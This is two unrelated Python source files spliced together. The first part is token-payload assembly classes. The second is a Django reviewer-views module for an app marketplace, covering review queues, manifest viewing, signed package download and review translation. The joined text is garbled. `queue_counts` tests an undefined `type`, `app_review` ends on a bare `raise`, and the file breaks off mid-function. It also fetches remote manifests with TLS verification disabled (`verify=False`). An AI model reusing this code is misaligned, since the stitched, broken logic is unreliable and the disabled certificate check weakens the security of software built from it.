class FederatedProjectScopedPayload(FederatedScopedPayload):
version = 5
class FederatedDomainScopedPayload(FederatedScopedPayload):
version = 6
class OauthScopedPayload(BasePayload):
version = 7
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_project_id = cls.attempt_convert_uuid_hex_to_bytes(project_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
b_access_token_id = cls.attempt_convert_uuid_hex_to_bytes(
access_token_id)
return (b_user_id, methods, b_project_id, b_access_token_id,
expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
(is_stored_as_bytes, project_id) = payload[2]
project_id = cls._convert_or_decode(is_stored_as_bytes, project_id)
(is_stored_as_bytes, access_token_id) = payload[3]
access_token_id = cls._convert_or_decode(is_stored_as_bytes,
access_token_id)
expires_at_str = cls._convert_float_to_time_string(payload[4])
audit_ids = list(map(cls.base64_encode, payload[5]))
system = None
domain_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class SystemScopedPayload(BasePayload):
version = 8
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, system, expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
system = payload[2]
expires_at_str = cls._convert_float_to_time_string(payload[3])
audit_ids = list(map(cls.base64_encode, payload[4]))
project_id = None
domain_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class ApplicationCredentialScopedPayload(BasePayload):
version = 9
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_project_id = cls.attempt_convert_uuid_hex_to_bytes(project_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
b_app_cred_id = cls.attempt_convert_uuid_hex_to_bytes(app_cred_id)
return (b_user_id, methods, b_project_id, expires_at_int, b_audit_ids,
b_app_cred_id)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
(is_stored_as_bytes, project_id) = payload[2]
project_id = cls._convert_or_decode(is_stored_as_bytes, project_id)
expires_at_str = cls._convert_float_to_time_string(payload[3])
audit_ids = list(map(cls.base64_encode, payload[4]))
system = None
domain_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
(is_stored_as_bytes, app_cred_id) = payload[5]
app_cred_id = cls._convert_or_decode(is_stored_as_bytes, app_cred_id)
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
_PAYLOAD_CLASSES = [
UnscopedPayload,
DomainScopedPayload,
ProjectScopedPayload,
TrustScopedPayload,
FederatedUnscopedPayload,
FederatedProjectScopedPayload,
FederatedDomainScopedPayload,
OauthScopedPayload,
SystemScopedPayload,
ApplicationCredentialScopedPayload,
]
| |
import collections
import datetime
import functools
import HTMLParser
import json
import os
import sys
import traceback
import urllib
from django import http
from django.conf import settings
from django.contrib import messages
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import Q
from django.db.models.signals import post_save
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import never_cache
import commonware.log
import jinja2
import requests
import waffle
from appvalidator.constants import PERMISSIONS
from cache_nuggets.lib import Token
from jingo.helpers import urlparams
from rest_framework import viewsets
from rest_framework.exceptions import ParseError
from rest_framework.generics import (CreateAPIView, ListAPIView, UpdateAPIView,
DestroyAPIView)
from rest_framework.permissions import AllowAny, BasePermission
from rest_framework.response import Response
from tower import ugettext as _
from waffle.decorators import waffle_switch
import mkt
from lib.crypto.packaged import SigningError
from mkt.abuse.forms import AppAbuseViewFormSet, WebsiteAbuseViewFormSet
from mkt.abuse.models import AbuseReport
from mkt.access import acl
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AnyOf, ByHttpMethod, GroupPermission
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.comm.forms import CommAttachmentFormSet
from mkt.constants import MANIFEST_CONTENT_TYPE
from mkt.developers.models import ActivityLog, ActivityLogAttachment
from mkt.ratings.forms import ReviewFlagFormSet
from mkt.ratings.models import Review, ReviewFlag
from mkt.regions.utils import parse_region
from mkt.reviewers.forms import (ApiReviewersSearchForm, ApproveRegionForm,
ModerateLogDetailForm, ModerateLogForm,
MOTDForm, TestedOnFormSet)
from mkt.reviewers.models import (AdditionalReview, CannedResponse,
QUEUE_TARAKO, ReviewerScore)
from mkt.reviewers.serializers import (AdditionalReviewSerializer,
CannedResponseSerializer,
ReviewerAdditionalReviewSerializer,
ReviewerScoreSerializer,
ReviewersESAppSerializer,
ReviewingSerializer)
from mkt.reviewers.utils import (AppsReviewing, log_reviewer_action,
ReviewApp, ReviewersQueuesHelper)
from mkt.search.filters import (ReviewerSearchFormFilter, SearchQueryFilter,
SortingFilter)
from mkt.search.views import SearchView
from mkt.site.decorators import json_view, login_required, permission_required
from mkt.site.helpers import absolutify, product_as_dict
from mkt.site.utils import (days_ago, escape_all, HttpResponseSendFile,
JSONEncoder, paginate, redirect_for_login,
smart_decode)
from mkt.submit.forms import AppFeaturesForm
from mkt.users.models import UserProfile
from mkt.webapps.decorators import app_view, app_view_factory
from mkt.webapps.models import AddonDeviceType, AddonUser, Version, Webapp
from mkt.webapps.signals import version_changed
from mkt.websites.decorators import website_view
from mkt.websites.models import Website
from mkt.zadmin.models import set_config, unmemoized_get_config
from . import forms
QUEUE_PER_PAGE = 100
log = commonware.log.getLogger('z.reviewers')
app_view_with_deleted = app_view_factory(Webapp.with_deleted.all)
def reviewer_required(region=None, moderator=False):
"""Requires the user to be logged in as a reviewer or admin, or allows
someone with rule 'ReviewerTools:View' for GET requests.
Reviewer is someone who is in one of the groups with the following
permissions:
Apps:Review
moderator=True extends this to users in groups who have the permssion:
Apps:ModerateReview
"""
def decorator(f):
@login_required
@functools.wraps(f)
def wrapper(request, *args, **kw):
reviewer_perm = acl.check_reviewer(request,
region=kw.get('region'))
moderator_perm = (moderator and
acl.action_allowed(request,
'Apps', 'ModerateReview'))
view_only = (request.method == 'GET' and
acl.action_allowed(request, 'ReviewerTools', 'View'))
if (reviewer_perm or moderator_perm or view_only):
return f(request, *args, **kw)
else:
raise PermissionDenied
return wrapper
# If decorator has no args, and is "paren-less", it's callable.
if callable(region):
return decorator(region)
else:
return decorator
@reviewer_required(moderator=True)
def route_reviewer(request):
"""
Redirect to apps home page if app reviewer.
"""
return http.HttpResponseRedirect(reverse('reviewers.home'))
@reviewer_required(moderator=True)
def home(request):
durations = (('new', _('New Apps (Under 5 days)')),
('med', _('Passable (5 to 10 days)')),
('old', _('Overdue (Over 10 days)')))
progress, percentage = _progress()
data = context(
request,
reviews_total=ActivityLog.objects.total_reviews(webapp=True)[:5],
reviews_monthly=ActivityLog.objects.monthly_reviews(webapp=True)[:5],
progress=progress,
percentage=percentage,
durations=durations,
full_reviewer=acl.check_reviewer(request)
)
return render(request, 'reviewers/home.html', data)
def queue_counts(request):
use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
queues_helper = ReviewersQueuesHelper(use_es=use_es)
counts = {
'pending': queues_helper.get_pending_queue().count(),
'rereview': queues_helper.get_rereview_queue().count(),
'updates': queues_helper.get_updates_queue().count(),
'escalated': queues_helper.get_escalated_queue().count(),
'moderated': queues_helper.get_moderated_queue().count(),
'abuse': queues_helper.get_abuse_queue().count(),
'abusewebsites': queues_helper.get_abuse_queue_websites().count(),
'region_cn': Webapp.objects.pending_in_region(mkt.regions.CHN).count(),
'additional_tarako': (
AdditionalReview.objects
.unreviewed(queue=QUEUE_TARAKO, and_approved=True)
.count()),
}
rv = {}
if isinstance(type, basestring):
return counts[type]
for k, v in counts.items():
if not isinstance(type, list) or k in type:
rv[k] = v
return rv
def _progress():
"""Returns unreviewed apps progress.
Return the number of apps still unreviewed for a given period of time and
the percentage.
"""
queues_helper = ReviewersQueuesHelper()
base_filters = {
'pending': (queues_helper.get_pending_queue(),
'nomination'),
'rereview': (queues_helper.get_rereview_queue(),
'created'),
'escalated': (queues_helper.get_escalated_queue(),
'created'),
'updates': (queues_helper.get_updates_queue(),
'nomination')
}
operators_and_values = {
'new': ('gt', days_ago(5)),
'med': ('range', (days_ago(10), days_ago(5))),
'old': ('lt', days_ago(10)),
'week': ('gte', days_ago(7))
}
types = base_filters.keys()
progress = {}
for t in types:
tmp = {}
base_query, field = base_filters[t]
for k in operators_and_values.keys():
operator, value = operators_and_values[k]
filter_ = {}
filter_['%s__%s' % (field, operator)] = value
tmp[k] = base_query.filter(**filter_).count()
progress[t] = tmp
def pct(p, t):
# Return the percent of (p)rogress out of (t)otal.
return (p / float(t)) * 100 if p > 0 else 0
percentage = {}
for t in types:
total = progress[t]['new'] + progress[t]['med'] + progress[t]['old']
percentage[t] = {}
for duration in ('new', 'med', 'old'):
percentage[t][duration] = pct(progress[t][duration], total)
return (progress, percentage)
def context(request, **kw):
statuses = dict((k, unicode(v)) for k, v in mkt.STATUS_CHOICES_API.items())
ctx = dict(motd=unmemoized_get_config('mkt_reviewers_motd'),
queue_counts=queue_counts(request),
search_url=reverse('reviewers-search-api'),
statuses=statuses, point_types=mkt.REVIEWED_MARKETPLACE)
ctx.update(kw)
return ctx
def _review(request, addon, version):
if (not settings.ALLOW_SELF_REVIEWS and
not acl.action_allowed(request, 'Admin', '%') and
addon.has_author(request.user)):
messages.warning(request, _('Self-reviews are not allowed.'))
return redirect(reverse('reviewers.home'))
if (addon.status == mkt.STATUS_BLOCKED and
not acl.action_allowed(request, 'Apps', 'ReviewEscalated')):
messages.warning(
request, _('Only senior reviewers can review blocklisted apps.'))
return redirect(reverse('reviewers.home'))
attachment_formset = CommAttachmentFormSet(data=request.POST or None,
files=request.FILES or None,
prefix='attachment')
testedon_formset = TestedOnFormSet(data=request.POST or None,
prefix='testedon')
form = forms.get_review_form(data=request.POST or None,
files=request.FILES or None, request=request,
addon=addon, version=version,
attachment_formset=attachment_formset,
testedon_formset=testedon_formset)
postdata = request.POST if request.method == 'POST' else None
all_forms = [form, attachment_formset, testedon_formset]
if version:
features_list = [unicode(f) for f in version.features.to_list()]
appfeatures_form = AppFeaturesForm(data=postdata,
instance=version.features)
all_forms.append(appfeatures_form)
else:
appfeatures_form = None
features_list = None
queue_type = form.helper.review_type
redirect_url = reverse('reviewers.apps.queue_%s' % queue_type)
is_admin = acl.action_allowed(request, 'Apps', 'Edit')
if request.method == 'POST' and all(f.is_valid() for f in all_forms):
if form.cleaned_data.get('action') == 'public':
old_types = set(o.id for o in addon.device_types)
new_types = set(form.cleaned_data.get('device_override'))
old_features = set(features_list)
new_features = set(unicode(f) for f
in appfeatures_form.instance.to_list())
if old_types != new_types:
# The reviewer overrode the device types. We need to not
# publish this app immediately.
if addon.publish_type == mkt.PUBLISH_IMMEDIATE:
addon.update(publish_type=mkt.PUBLISH_PRIVATE)
# And update the device types to what the reviewer set.
AddonDeviceType.objects.filter(addon=addon).delete()
for device in form.cleaned_data.get('device_override'):
addon.addondevicetype_set.create(device_type=device)
# Log that the reviewer changed the device types.
added_devices = new_types - old_types
removed_devices = old_types - new_types
msg_list = [
_(u'Added {0}').format(unicode(mkt.DEVICE_TYPES[d].name))
for d in added_devices
] + [
_(u'Removed {0}').format(unicode(mkt.DEVICE_TYPES[d].name))
for d in removed_devices
]
msg = _(u'Device(s) changed by '
u'reviewer: {0}').format(', '.join(msg_list))
log_reviewer_action(addon, request.user, msg,
mkt.LOG.REVIEW_DEVICE_OVERRIDE)
if old_features != new_features:
# The reviewer overrode the requirements. We need to not
# publish this app immediately.
if addon.publish_type == mkt.PUBLISH_IMMEDIATE:
addon.update(publish_type=mkt.PUBLISH_PRIVATE)
appfeatures_form.save(mark_for_rereview=False)
# Log that the reviewer changed the minimum requirements.
added_features = new_features - old_features
removed_features = old_features - new_features
fmt = ', '.join(
[_(u'Added {0}').format(f) for f in added_features] +
[_(u'Removed {0}').format(f) for f in removed_features])
# L10n: {0} is the list of requirements changes.
msg = _(u'Requirements changed by reviewer: {0}').format(fmt)
log_reviewer_action(addon, request.user, msg,
mkt.LOG.REVIEW_FEATURES_OVERRIDE)
score = form.helper.process()
# Success message.
if score:
score = ReviewerScore.objects.filter(user=request.user)[0]
# L10N: {0} is the type of review. {1} is the points they earned.
# {2} is the points they now have total.
success = _(
u'"{0}" successfully processed (+{1} points, {2} total).'
.format(unicode(mkt.REVIEWED_CHOICES[score.note_key]),
score.score,
ReviewerScore.get_total(request.user)))
else:
success = _('Review successfully processed.')
messages.success(request, success)
return redirect(redirect_url)
canned = CannedResponse.objects.all()
actions = form.helper.actions.items()
try:
if not version:
raise Version.DoesNotExist
show_diff = (addon.versions.exclude(id=version.id)
.filter(files__isnull=False,
created__lt=version.created,
files__status=mkt.STATUS_PUBLIC)
.latest())
except Version.DoesNotExist:
show_diff = None
# The actions we should show a minimal form from.
actions_minimal = [k for (k, a) in actions if not a.get('minimal')]
# We only allow the user to check/uncheck files for "pending"
allow_unchecking_files = form.helper.review_type == "pending"
versions = (Version.with_deleted.filter(addon=addon)
.order_by('-created')
.transform(Version.transformer_activity)
.transform(Version.transformer))
product_attrs = {
'product': json.dumps(
product_as_dict(request, addon, False, 'reviewer'),
cls=JSONEncoder),
'manifest_url': addon.manifest_url,
}
pager = paginate(request, versions, 10)
num_pages = pager.paginator.num_pages
count = pager.paginator.count
ctx = context(request, version=version, product=addon, pager=pager,
num_pages=num_pages, count=count,
form=form, canned=canned, is_admin=is_admin,
status_types=mkt.STATUS_CHOICES, show_diff=show_diff,
allow_unchecking_files=allow_unchecking_files,
actions=actions, actions_minimal=actions_minimal,
tab=queue_type, product_attrs=product_attrs,
attachment_formset=attachment_formset,
appfeatures_form=appfeatures_form,
testedon_formset=testedon_formset)
if features_list is not None:
ctx['feature_list'] = features_list
return render(request, 'reviewers/review.html', ctx)
@reviewer_required
@app_view_with_deleted
def app_review(request, addon):
version = addon.latest_version
resp = None
try:
with transaction.atomic():
resp = _review(request, addon, version)
except SigningError, exc:
messages.error(request, 'Signing Error: %s' % exc)
return redirect(
reverse('reviewers.apps.review', args=[addon.app_slug]))
# We (hopefully) have been avoiding sending send post_save and
# version_changed signals in the review process till now (_review()
# uses ReviewHelper which should have done all of its update() calls
# with _signal=False).
#
# Now is a good time to send them: the transaction we were in has been
# committed, so we know everything is ok. This is important: we need
# them to index the app or call update_version() if that wasn't done
# before already.
if request.method == 'POST':
post_save.send(sender=Webapp, instance=addon, created=False)
post_save.send(sender=Version, instance=version, created=False)
if getattr(addon, 'resend_version_changed_signal', False):
version_changed.send(sender=addon)
del addon.resend_version_changed_signal
if resp:
return resp
raise
QueuedApp = collections.namedtuple('QueuedApp', 'app date_field')
ActionableQueuedApp = collections.namedtuple(
'QueuedApp', 'app date_field action_url')
def _queue(request, apps, tab, pager_processor=None, date_sort='created',
template='reviewers/queue.html', data=None, use_es=False):
per_page = request.GET.get('per_page', QUEUE_PER_PAGE)
pager = paginate(request, apps, per_page)
ctx = {
'addons': pager.object_list,
'pager': pager,
'tab': tab,
'search_form': _get_search_form(request),
'date_sort': date_sort,
'use_es': use_es,
}
# Additional context variables.
if data is not None:
ctx.update(data)
return render(request, template, context(request, **ctx))
@reviewer_required
def queue_apps(request):
use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
sort_field = 'nomination'
queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
apps = queues_helper.get_pending_queue()
apps = queues_helper.sort(apps, date_sort=sort_field)
if use_es:
apps = [QueuedApp(app, app.latest_version.nomination_date)
for app in apps.execute()]
else:
apps = [QueuedApp(app, app.all_versions[0].nomination)
for app in Webapp.version_and_file_transformer(apps)]
return _queue(request, apps, 'pending', date_sort='nomination',
use_es=use_es)
@reviewer_required
def queue_region(request, region=None):
# TODO: Create a landing page that lists all the special regions.
if region is None:
raise http.Http404
region = parse_region(region)
column = '_geodata__region_%s_nominated' % region.slug
queues_helper = ReviewersQueuesHelper(request)
qs = Webapp.objects.pending_in_region(region)
apps = [ActionableQueuedApp(app, app.geodata.get_nominated_date(region),
reverse('approve-region',
args=[app.id, region.slug]))
for app in queues_helper.sort(qs, date_sort=column)]
return _queue(request, apps, 'region', date_sort=column,
template='reviewers/queue_region.html',
data={'region': region})
@permission_required([('Apps', 'ReviewTarako')])
def additional_review(request, queue):
"""HTML page for an additional review queue."""
sort_descending = request.GET.get('order') == 'desc'
# TODO: Add `.select_related('app')`. Currently it won't load the name.
additional_reviews = AdditionalReview.objects.unreviewed(
queue=queue, and_approved=True, descending=sort_descending)
apps = [ActionableQueuedApp(additional_review.app,
additional_review.created,
reverse('additionalreview-detail',
args=[additional_review.pk]))
for additional_review in additional_reviews]
return _queue(request, apps, queue, date_sort='created',
template='reviewers/additional_review.html',
data={'queue': queue})
@reviewer_required
def queue_rereview(request):
use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
apps = queues_helper.get_rereview_queue()
apps = queues_helper.sort(apps, date_sort='created')
if use_es:
apps = [QueuedApp(app, app.rereview_date) for app in apps.execute()]
else:
apps = [QueuedApp(app, app.rereviewqueue_set.all()[0].created)
for app in apps]
return _queue(request, apps, 'rereview', date_sort='created',
use_es=use_es)
@permission_required([('Apps', 'ReviewEscalated')])
def queue_escalated(request):
use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
apps = queues_helper.get_escalated_queue()
apps = queues_helper.sort(apps, date_sort='created')
if use_es:
apps = [QueuedApp(app, app.escalation_date) for app in apps.execute()]
else:
apps = [QueuedApp(app, app.escalationqueue_set.all()[0].created)
for app in apps]
return _queue(request, apps, 'escalated', date_sort='created',
use_es=use_es)
@reviewer_required
def queue_updates(request):
use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
apps = queues_helper.get_updates_queue()
apps = queues_helper.sort(apps, date_sort='nomination')
if use_es:
apps = [QueuedApp(app, app.latest_version.nomination_date)
for app in apps.execute()]
else:
apps = [QueuedApp(app, app.all_versions[0].nomination)
for app in Webapp.version_and_file_transformer(apps)]
return _queue(request, apps, 'updates', date_sort='nomination',
use_es=use_es)
@permission_required([('Apps', 'ModerateReview')])
def queue_moderated(request):
"""Queue for reviewing app reviews."""
queues_helper = ReviewersQueuesHelper(request)
qs = queues_helper.get_moderated_queue()
page = paginate(request, qs, per_page=20)
flags = dict(ReviewFlag.FLAGS)
reviews_formset = ReviewFlagFormSet(request.POST or None,
queryset=page.object_list,
request=request)
if reviews_formset.is_valid():
reviews_formset.save()
return redirect(reverse('reviewers.apps.queue_moderated'))
return render(request, 'reviewers/queue.html',
context(request, reviews_formset=reviews_formset,
tab='moderated', page=page, flags=flags))
@permission_required([('Apps', 'ReadAbuse')])
def queue_abuse(request):
"""Queue for reviewing abuse reports for apps."""
queues_helper = ReviewersQueuesHelper(request)
apps = queues_helper.get_abuse_queue()
page = paginate(request, apps, per_page=20)
abuse_formset = AppAbuseViewFormSet(request.POST or None,
queryset=page.object_list,
request=request)
if abuse_formset.is_valid():
abuse_formset.save()
return redirect(reverse('reviewers.apps.queue_abuse'))
return render(request, 'reviewers/queue.html',
context(request, abuse_formset=abuse_formset,
tab='abuse', page=page))
@permission_required([('Websites', 'ReadAbuse')])
def queue_abuse_websites(request):
"""Queue for reviewing abuse reports for websites."""
queues_helper = ReviewersQueuesHelper(request)
sites = queues_helper.get_abuse_queue_websites()
page = paginate(request, sites, per_page=20)
abuse_formset = WebsiteAbuseViewFormSet(request.POST or None,
queryset=page.object_list,
request=request)
if abuse_formset.is_valid():
abuse_formset.save()
return redirect(reverse('reviewers.websites.queue_abuse'))
return render(request, 'reviewers/queue.html',
context(request, abuse_formset=abuse_formset,
tab='abusewebsites', page=page))
def _get_search_form(request):
form = ApiReviewersSearchForm()
fields = [f.name for f in form.visible_fields() + form.hidden_fields()]
get = dict((k, v) for k, v in request.GET.items() if k in fields)
return ApiReviewersSearchForm(get or None)
@reviewer_required
def logs(request):
data = request.GET.copy()
if not data.get('start') and not data.get('end'):
today = datetime.date.today()
data['start'] = today - datetime.timedelta(days=30)
form = forms.ReviewLogForm(data)
approvals = ActivityLog.objects.review_queue(webapp=True)
if form.is_valid():
data = form.cleaned_data
if data.get('start'):
approvals = approvals.filter(created__gte=data['start'])
if data.get('end'):
approvals = approvals.filter(created__lt=data['end'])
if data.get('search'):
term = data['search']
approvals = approvals.filter(
Q(commentlog__comments__icontains=term) |
Q(applog__addon__name__localized_string__icontains=term) |
Q(applog__addon__app_slug__icontains=term) |
Q(user__display_name__icontains=term) |
Q(user__email__icontains=term)).distinct()
pager = paginate(request, approvals, 50)
data = context(request, form=form, pager=pager, ACTION_DICT=mkt.LOG_BY_ID,
tab='logs')
return render(request, 'reviewers/logs.html', data)
@reviewer_required
def motd(request):
form = None
motd = unmemoized_get_config('mkt_reviewers_motd')
if acl.action_allowed(request, 'AppReviewerMOTD', 'Edit'):
form = MOTDForm(request.POST or None, initial={'motd': motd})
if form and request.method == 'POST' and form.is_valid():
set_config(u'mkt_reviewers_motd', form.cleaned_data['motd'])
messages.success(request, _('Changes successfully saved.'))
return redirect(reverse('reviewers.apps.motd'))
data = context(request, form=form)
return render(request, 'reviewers/motd.html', data)
def _get_permissions(manifest):
permissions = {}
for perm in manifest.get('permissions', {}).keys():
pval = permissions[perm] = {'type': 'web'}
if perm in PERMISSIONS['privileged']:
pval['type'] = 'priv'
elif perm in PERMISSIONS['certified']:
pval['type'] = 'cert'
pval['description'] = manifest['permissions'][perm].get('description')
return permissions
def _get_manifest_json(addon):
return addon.get_manifest_json(addon.versions.latest().all_files[0])
@permission_required([('AppLookup', 'View'), ('Apps', 'Review')])
@app_view_with_deleted
@json_view
def app_view_manifest(request, addon):
headers = {}
manifest = {}
success = False
if addon.is_packaged:
manifest = _get_manifest_json(addon)
content = json.dumps(manifest, indent=4)
success = True
else: # Show the hosted manifest_url.
content, headers = u'', {}
if addon.manifest_url:
try:
req = requests.get(
addon.manifest_url, verify=False,
headers={'User-Agent': settings.MARKETPLACE_USER_AGENT})
content, headers = req.content, req.headers
success = True
except Exception:
content = u''.join(traceback.format_exception(*sys.exc_info()))
else:
success = True
try:
# Reindent the JSON.
manifest = json.loads(content)
content = json.dumps(manifest, indent=4)
except:
# If it's not valid JSON, just return the content as is.
pass
return {
'content': jinja2.escape(smart_decode(content)),
'headers': dict((jinja2.escape(k), jinja2.escape(v))
for k, v in headers.items()),
'success': success,
# Note: We're using `escape_all` on the values here since we know the
# keys of the nested dict don't come from user input (manifest) and are
# known safe.
'permissions': dict((jinja2.escape(k), escape_all(v))
for k, v in _get_permissions(manifest).items())
}
def reviewer_or_token_required(f):
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
# If there is a 'token' in request.GET we either return 200 or 403.
# Otherwise we treat it like a normal django view and redirect to a
# login page or check for Apps:Review permissions.
allowed = False
token = request.GET.get('token')
if token and Token.pop(token, data={'app_id': addon.id}):
log.info('Token for app:%s was successfully used' % addon.id)
allowed = True
elif not token and not request.user.is_authenticated():
return redirect_for_login(request)
elif acl.action_allowed(request, 'Apps', 'Review'):
allowed = True
if allowed:
if token:
log.info('Token provided for app:%s and all was happy'
% addon.id)
else:
log.info('Apps:Review (no token) all happy for app:%s'
% addon.id)
return f(request, addon, *args, **kw)
else:
if token:
log.info('Token provided for app:%s but was not valid'
% addon.id)
else:
log.info('Apps:Review permissions not met for app:%s'
% addon.id)
raise PermissionDenied
return wrapper
@app_view
@reviewer_or_token_required
def mini_manifest(request, addon, version_id):
token = request.GET.get('token')
return http.HttpResponse(_mini_manifest(addon, version_id, token),
content_type=MANIFEST_CONTENT_TYPE)
def _mini_manifest(addon, version_id, token=None):
if not addon.is_packaged:
raise http.Http404
version = get_object_or_404(addon.versions, pk=version_id)
file_ = version.all_files[0]
manifest = addon.get_manifest_json(file_)
package_path = absolutify(
reverse('reviewers.signed', args=[addon.app_slug, version.id]))
if token:
# Generate a fresh token.
token = Token(data={'app_id': addon.id})
token.save()
package_path = urlparams(package_path, token=token.token)
data = {
'name': manifest['name'],
'version': version.version,
'size': file_.size,
'release_notes': version.releasenotes,
'package_path': package_path,
}
for key in ['developer', 'icons', 'locales']:
if key in manifest:
data[key] = manifest[key]
return json.dumps(data, cls=JSONEncoder)
@permission_required([('Apps', 'ReadAbuse'), ('Apps', 'Review')])
@app_view
def app_abuse(request, addon):
reports = AbuseReport.objects.filter(addon=addon).order_by('-created')
total = reports.count()
reports = paginate(request, reports, count=total)
return render(request, 'reviewers/abuse.html',
context(request, item=addon, reports=reports,
total=total))
@permission_required([('Websites', 'ReadAbuse'), ('Websites', 'Review')])
@website_view
def website_abuse(request, website):
reports = AbuseReport.objects.filter(website=website).order_by('-created')
total = reports.count()
reports = paginate(request, reports, count=total)
return render(request, 'reviewers/abuse.html',
context(request, item=website, reports=reports,
total=total))
@app_view
@reviewer_or_token_required
def get_signed_packaged(request, addon, version_id):
version = get_object_or_404(addon.versions, pk=version_id)
file = version.all_files[0]
path = addon.sign_if_packaged(version.pk, reviewer=True)
if not path:
raise http.Http404
log.info('Returning signed package addon: %s, version: %s, path: %s' %
(addon.pk, version_id, path))
return HttpResponseSendFile(request, path, content_type='application/zip',
etag=file.hash.split(':')[-1])
@reviewer_required(moderator=True)
def performance(request, email=None):
is_admin = acl.action_allowed(request, 'Admin', '%')
if email:
if email == request.user.email:
user = request.user
elif is_admin:
user = get_object_or_404(UserProfile, email=email)
else:
raise http.Http404
else:
user = request.user
today = datetime.date.today()
month_ago = today - datetime.timedelta(days=30)
year_ago = today - datetime.timedelta(days=365)
total = ReviewerScore.get_total(user)
totals = ReviewerScore.get_performance(user)
months = ReviewerScore.get_performance_since(user, month_ago)
years = ReviewerScore.get_performance_since(user, year_ago)
def _sum(iter):
return sum(s.total or 0 for s in iter)
performance = {
'month': _sum(months),
'year': _sum(years),
'total': _sum(totals),
}
ctx = context(request, **{
'profile': user,
'total': total,
'performance': performance,
})
return render(request, 'reviewers/performance.html', ctx)
@reviewer_required(moderator=True)
def leaderboard(request):
return render(request, 'reviewers/leaderboard.html',
context(request,
**{'scores': ReviewerScore.all_users_by_score()}))
@reviewer_required
@json_view
def apps_reviewing(request):
return render(request, 'reviewers/apps_reviewing.html',
context(request,
**{'tab': 'reviewing',
'apps': AppsReviewing(request).get_apps()}))
@reviewer_required
def attachment(request, attachment):
"""
Serve an attachment directly to the user.
"""
try:
a = ActivityLogAttachment.objects.get(pk=attachment)
full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
a.filepath)
fsock = open(full_path, 'r')
except (ActivityLogAttachment.DoesNotExist, IOError,):
response = http.HttpResponseNotFound()
else:
filename = urllib.quote(a.filename())
response = http.HttpResponse(fsock,
content_type='application/force-download')
response['Content-Disposition'] = 'attachment; filename=%s' % filename
response['Content-Length'] = os.path.getsize(full_path)
return response
def _retrieve_translation(text, language):
try:
r = requests.get(
settings.GOOGLE_TRANSLATE_API_URL, params={
'key': getattr(settings, 'GOOGLE_API_CREDENTIALS', ''),
'q': text, 'target': language},
headers={'User-Agent': settings.MARKETPLACE_USER_AGENT})
except Exception, e:
log.error(e)
raise
try:
translated = (HTMLParser.HTMLParser().unescape(
r.json()['data']['translations'][0]['translatedText']))
except (KeyError, IndexError):
translated = ''
return translated, r
@waffle_switch('reviews-translate')
@permission_required([('Apps', 'ModerateReview')])
def review_translate(request, app_slug, review_pk, language):
review = get_object_or_404(Review, addon__app_slug=app_slug, pk=review_pk)
if '-' in language:
language = language.split('-')[0]
if request.is_ajax():
title = ''
body = ''
status = 200
if review.title is not None:
title, r = _retrieve_translation(review.title, language)
if r.status_code != 200:
status = r.status_code
if review.body is not None:
body, r = _retrieve_translation(review.body, language)
if r.status_code != 200:
status = r.status_code
return http.HttpResponse(json.dumps({'title': title, 'body': body}),
status=status)
else:
